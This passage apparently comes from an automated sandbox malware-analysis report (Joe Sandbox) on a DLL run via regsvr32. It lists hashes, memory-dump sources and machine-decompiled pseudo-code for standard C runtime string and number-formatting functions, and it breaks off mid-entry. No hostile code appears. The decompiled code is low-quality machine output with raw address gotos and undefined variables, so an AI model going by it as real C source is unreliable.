                                • Opcode Fuzzy Hash: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                • Instruction Fuzzy Hash: 8202ED7260CBC186E7B1CB25E8857AEB7E4F384795F200125EACD86AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D363E0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 260COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                • API String ID: 2192614184-660564692
                                • Opcode ID: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                • Instruction ID: 0047506df9643dfb2240c3b63e02d4c6faf0d454733b2a9523d16aca39b446dd
                                • Opcode Fuzzy Hash: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                • Instruction Fuzzy Hash: E5E10B32A0DBC685E7B09B14E8457AEA3E0F384794FA04625D6DD53AE8DF7ED484CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D355F0 Relevance: 24.2, APIs: 16, Instructions: 206COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				void* _v64;
				long long _v72;
				void* _t88;
				void* _t89;
				void* _t107;
				void* _t109;
				signed int* _t158;
				signed int* _t160;
				long long _t175;
				long long _t186;
				signed int* _t187;
				signed int* _t193;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v72 = 0;
				_t158 = _a24;
				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
				_v56 = _t158 + _a24[1];
				goto 0xf9d35642;
				_v56 = 0;
				if (_v56 == 0) goto 0xf9d356aa;
				_t160 = _a24;
				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
				E000007FE7FEF9D2E680(_t89, _t160);
				_v48 = _t160 + _a24[1];
				goto 0xf9d3567c;
				_v48 = 0;
				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
				if (_a24[2] != 0) goto 0xf9d356b1;
				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
				goto 0xf9d35966;
				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
				_v64 = _a16;
				goto 0xf9d356e9;
				_v64 = _a24[2] +  *_a16;
				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
				_t175 = _v64;
				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
				 *_v64 = _t175;
				goto 0xf9d35760;
				E000007FE7FEF9D2CF80(_t175);
				goto 0xf9d3595a;
				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
				if (_a32[5] != 8) goto 0xf9d35807;
				if ( *_v64 == 0) goto 0xf9d35807;
				_t186 = _v64;
				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
				 *_v64 = _t186;
				goto 0xf9d3580e;
				_t109 = E000007FE7FEF9D2CF80(_t186);
				goto 0xf9d3595a;
				_t187 = _a32;
				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
				E000007FE7FEF9D2E6A0(_t109, _t187);
				_v40 = _t187 + _a32[6];
				goto 0xf9d35845;
				_v40 = 0;
				if (_v40 != 0) goto 0xf9d358c6;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
				_t191 = _a32[5];
				_v32 = _a32[5];
				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
				goto 0xf9d358c1;
				E000007FE7FEF9D2CF80(_t191);
				goto 0xf9d3595a;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
				_t193 = _a32;
				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
				E000007FE7FEF9D2E6A0(_t117, _t193);
				_v24 = _t193 + _a32[6];
				goto 0xf9d35922;
				_v24 = 0;
				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
				_t195 = _a32;
				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
				_v72 = 2;
				goto 0xf9d35953;
				_v72 = 1;
				goto 0xf9d3595a;
				E000007FE7FEF9D2CF80(_a32);
				E000007FE7FEF9D2CF50(_t195);
				return _v72;
			}




















                                0x7fef9d355f0
                                0x7fef9d355f5
                                0x7fef9d355fa
                                0x7fef9d355ff
                                0x7fef9d35608
                                0x7fef9d35610
                                0x7fef9d3561c
                                0x7fef9d3561e
                                0x7fef9d35632
                                0x7fef9d35637
                                0x7fef9d35639
                                0x7fef9d35648
                                0x7fef9d3564a
                                0x7fef9d35656
                                0x7fef9d35658
                                0x7fef9d3566c
                                0x7fef9d35671
                                0x7fef9d35673
                                0x7fef9d35687
                                0x7fef9d35695
                                0x7fef9d356a8
                                0x7fef9d356ac
                                0x7fef9d356c2
                                0x7fef9d356c9
                                0x7fef9d356ce
                                0x7fef9d356e4
                                0x7fef9d356f8
                                0x7fef9d3570f
                                0x7fef9d35722
                                0x7fef9d35732
                                0x7fef9d35744
                                0x7fef9d3574c
                                0x7fef9d35756
                                0x7fef9d35759
                                0x7fef9d3575b
                                0x7fef9d35760
                                0x7fef9d35774
                                0x7fef9d3578f
                                0x7fef9d357a2
                                0x7fef9d357c1
                                0x7fef9d357d6
                                0x7fef9d357e1
                                0x7fef9d357f2
                                0x7fef9d357fa
                                0x7fef9d35804
                                0x7fef9d35807
                                0x7fef9d35809
                                0x7fef9d3580e
                                0x7fef9d35813
                                0x7fef9d3581f
                                0x7fef9d35821
                                0x7fef9d35835
                                0x7fef9d3583a
                                0x7fef9d3583c
                                0x7fef9d3584b
                                0x7fef9d35862
                                0x7fef9d35875
                                0x7fef9d3587f
                                0x7fef9d35883
                                0x7fef9d358a0
                                0x7fef9d358b5
                                0x7fef9d358ba
                                0x7fef9d358bc
                                0x7fef9d358c1
                                0x7fef9d358db
                                0x7fef9d358ee
                                0x7fef9d358f0
                                0x7fef9d358fc
                                0x7fef9d358fe
                                0x7fef9d35912
                                0x7fef9d35917
                                0x7fef9d35919
                                0x7fef9d3592e
                                0x7fef9d35930
                                0x7fef9d3593f
                                0x7fef9d35941
                                0x7fef9d35949
                                0x7fef9d3594b
                                0x7fef9d35953
                                0x7fef9d35955
                                0x7fef9d3595c
                                0x7fef9d3596a

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                • String ID:
                                • API String ID: 801082872-0
                                • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D38D00 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 287COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                • API String ID: 2123368286-1993839260
                                • Opcode ID: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                • Instruction ID: 118e4e4707969e3dac6bf015ec0fe9163e407fa4248f5c8d89799a475a93b5a4
                                • Opcode Fuzzy Hash: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                • Instruction Fuzzy Hash: 49E11B72A1CB86CAE7A08B18E8447AEB3E1F384755F604525E6CD43BB8DB7ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D37030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 282COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                • API String ID: 2123368286-1853640030
                                • Opcode ID: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                • Instruction ID: 2769aadc75a8f45e94697a4dd9f042802452aa73cd8bd2afe7c03a6eee30acd9
                                • Opcode Fuzzy Hash: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                • Instruction Fuzzy Hash: D7E12A32A1DB86CAE7A08B59E8447AEB7E1F385354F604125E6CD43BB8DB7ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3E6C6 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332COMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t224;
				signed char _t229;
				void* _t260;
				intOrPtr _t268;
				signed int _t342;
				signed int _t343;
				signed long long _t346;
				intOrPtr* _t365;
				intOrPtr* _t370;
				signed long long _t400;

				_t342 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a1220 = 7;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t342;
				goto 0xf9d3e844;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t342;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
				_t343 = E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e807;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e844;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
				if (_a1304 >= 0) goto 0xf9d3e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0xf9d3e88b;
				_t346 = _a1304;
				_a1312 = _t346;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
				_a1312 = _a1312 & _t346;
				if (_a116 >= 0) goto 0xf9d3e8d1;
				_a116 = 1;
				goto 0xf9d3e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0xf9d3e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t224 = _a116;
				_a116 = _a116 - 1;
				if (_t224 > 0) goto 0xf9d3e92f;
				if (_a1312 == 0) goto 0xf9d3e9cc;
				_a1480 = _a72;
				_a1296 = _t224 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
				_t229 = _a1296 + _a1220;
				_a1296 = _t229;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3e90e;
				_a104 = _t229;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
				if (_a104 == 0) goto 0xf9d3ea0b;
				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0xf9d3ec29;
				if (_a104 <= 0) goto 0xf9d3ec29;
				_t365 = _a64;
				_a1328 = _t365;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0xf9d3ec27;
				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
				_a1496 = _t365;
				E000007FE7FEF9D26840(_t260,  &_a120);
				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0xf9d3ebe7;
				_a1200 = 0xffffffff;
				goto 0xf9d3ec27;
				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0xf9d3eb61;
				goto 0xf9d3ec47;
				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0xf9d3ec9c;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3da75;
				if (_a1216 == 0) goto 0xf9d3ecc2;
				if (_a1216 == 7) goto 0xf9d3ecc2;
				_a1504 = 0;
				goto 0xf9d3eccd;
				_a1504 = 1;
				_t268 = _a1504;
				_a1344 = _t268;
				if (_a1344 != 0) goto 0xf9d3ed13;
				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t370;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t268 != 1) goto 0xf9d3ed13;
				asm("int3");
				if (_a1344 != 0) goto 0xf9d3ed6f;
				0xf9d2ab30();
				 *_t370 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3ed8e;
				_a1380 = _a1200;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                0x7fef9d3e6c6
                                0x7fef9d3e6cd
                                0x7fef9d3e6d1
                                0x7fef9d3e6de
                                0x7fef9d3e6eb
                                0x7fef9d3e6f7
                                0x7fef9d3e6ff
                                0x7fef9d3e70c
                                0x7fef9d3e717
                                0x7fef9d3e72a
                                0x7fef9d3e731
                                0x7fef9d3e740
                                0x7fef9d3e745
                                0x7fef9d3e74f
                                0x7fef9d3e762
                                0x7fef9d3e768
                                0x7fef9d3e77b
                                0x7fef9d3e785
                                0x7fef9d3e78a
                                0x7fef9d3e792
                                0x7fef9d3e7a2
                                0x7fef9d3e7ac
                                0x7fef9d3e7b1
                                0x7fef9d3e7b9
                                0x7fef9d3e7c7
                                0x7fef9d3e7d2
                                0x7fef9d3e7e1
                                0x7fef9d3e7e5
                                0x7fef9d3e7ed
                                0x7fef9d3e7f7
                                0x7fef9d3e7ff
                                0x7fef9d3e807
                                0x7fef9d3e812
                                0x7fef9d3e81c
                                0x7fef9d3e823
                                0x7fef9d3e82b
                                0x7fef9d3e835
                                0x7fef9d3e83c
                                0x7fef9d3e84d
                                0x7fef9d3e858
                                0x7fef9d3e865
                                0x7fef9d3e871
                                0x7fef9d3e879
                                0x7fef9d3e87b
                                0x7fef9d3e883
                                0x7fef9d3e896
                                0x7fef9d3e8a3
                                0x7fef9d3e8b8
                                0x7fef9d3e8c5
                                0x7fef9d3e8c7
                                0x7fef9d3e8cf
                                0x7fef9d3e8d8
                                0x7fef9d3e8e4
                                0x7fef9d3e8e6
                                0x7fef9d3e8f7
                                0x7fef9d3e8f9
                                0x7fef9d3e909
                                0x7fef9d3e90e
                                0x7fef9d3e918
                                0x7fef9d3e91e
                                0x7fef9d3e929
                                0x7fef9d3e934
                                0x7fef9d3e957
                                0x7fef9d3e963
                                0x7fef9d3e990
                                0x7fef9d3e9a2
                                0x7fef9d3e9a4
                                0x7fef9d3e9b8
                                0x7fef9d3e9c2
                                0x7fef9d3e9c7
                                0x7fef9d3e9d9
                                0x7fef9d3e9e5
                                0x7fef9d3e9f5
                                0x7fef9d3e9fc
                                0x7fef9d3ea09
                                0x7fef9d3ea13
                                0x7fef9d3ea1d
                                0x7fef9d3ea26
                                0x7fef9d3ea2f
                                0x7fef9d3ea3e
                                0x7fef9d3ea4b
                                0x7fef9d3ea52
                                0x7fef9d3ea57
                                0x7fef9d3ea5f
                                0x7fef9d3ea6a
                                0x7fef9d3ea71
                                0x7fef9d3ea76
                                0x7fef9d3ea7e
                                0x7fef9d3ea89
                                0x7fef9d3ea90
                                0x7fef9d3ea95
                                0x7fef9d3eaad
                                0x7fef9d3eabd
                                0x7fef9d3eada
                                0x7fef9d3eaf8
                                0x7fef9d3eb06
                                0x7fef9d3eb11
                                0x7fef9d3eb2e
                                0x7fef9d3eb38
                                0x7fef9d3eb43
                                0x7fef9d3eb49
                                0x7fef9d3eb4e
                                0x7fef9d3eb5a
                                0x7fef9d3eb71
                                0x7fef9d3eb7a
                                0x7fef9d3eb85
                                0x7fef9d3eb8a
                                0x7fef9d3eb97
                                0x7fef9d3ebc9
                                0x7fef9d3ebd8
                                0x7fef9d3ebda
                                0x7fef9d3ebe5
                                0x7fef9d3ebff
                                0x7fef9d3ec1a
                                0x7fef9d3ec22
                                0x7fef9d3ec27
                                0x7fef9d3ec42
                                0x7fef9d3ec4f
                                0x7fef9d3ec5a
                                0x7fef9d3ec77
                                0x7fef9d3ec82
                                0x7fef9d3ec8e
                                0x7fef9d3ec93
                                0x7fef9d3ec9c
                                0x7fef9d3eca9
                                0x7fef9d3ecb3
                                0x7fef9d3ecb5
                                0x7fef9d3ecc0
                                0x7fef9d3ecc2
                                0x7fef9d3eccd
                                0x7fef9d3ecd4
                                0x7fef9d3ece3
                                0x7fef9d3ece5
                                0x7fef9d3ecec
                                0x7fef9d3ecf1
                                0x7fef9d3ecf4
                                0x7fef9d3ed06
                                0x7fef9d3ed0e
                                0x7fef9d3ed10
                                0x7fef9d3ed1b
                                0x7fef9d3ed1d
                                0x7fef9d3ed22
                                0x7fef9d3ed28
                                0x7fef9d3ed31
                                0x7fef9d3ed4c
                                0x7fef9d3ed51
                                0x7fef9d3ed61
                                0x7fef9d3ed6d
                                0x7fef9d3ed76
                                0x7fef9d3ed82
                                0x7fef9d3eda5

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1967237116-1983305044
                                • Opcode ID: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                • Instruction ID: 35e4d6cfc5d3e5722aa157ca10994467d352d975a6b38eaa5eb17889d52142ca
                                • Opcode Fuzzy Hash: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                • Instruction Fuzzy Hash: 7AF1D872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D32D80 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 310COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                • API String ID: 2123368286-3477667311
                                • Opcode ID: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                • Instruction ID: c8a25613ed3391733179227ae6d5cd1be8fc2ee2dc7f1a1db629f40b2a14394d
                                • Opcode Fuzzy Hash: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                • Instruction Fuzzy Hash: CAF13832A0DB8685EBE08B19E94476EA3E0F385790F604535D6DE83BA8DF7ED045CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D369C0 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 303COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
